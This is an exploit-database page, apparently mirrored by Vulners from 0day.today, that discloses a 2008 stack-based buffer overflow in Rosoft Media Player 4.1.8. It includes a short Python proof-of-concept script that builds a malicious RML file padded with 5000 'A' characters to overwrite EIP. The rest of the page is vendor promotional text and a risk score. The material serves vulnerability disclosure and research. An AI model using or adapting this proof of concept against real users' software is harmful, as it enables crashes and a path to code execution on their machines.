Lucene search
K

Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC

🗓️ 15 Mar 2008 00:00:00Reported by Wiktor SierocinskiType 
zdt
 zdt
🔗 0day.today👁 10 Views

Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflo

Code
=============================================================
Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC
=============================================================




Description:
This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian. 
This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before. 

Author: Wiktor Sierocinski
POC:

#!/usr/bin/python

content = (
"#EXTINF:Played=0\n" + "A" * 5000 + "\n"
)

fd = open("music.rml","w");
fd.write(content)
fd.close();

print "RML FILE CREATED"



#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Mar 2008 00:00Current
7High risk
Vulners AI Score7
10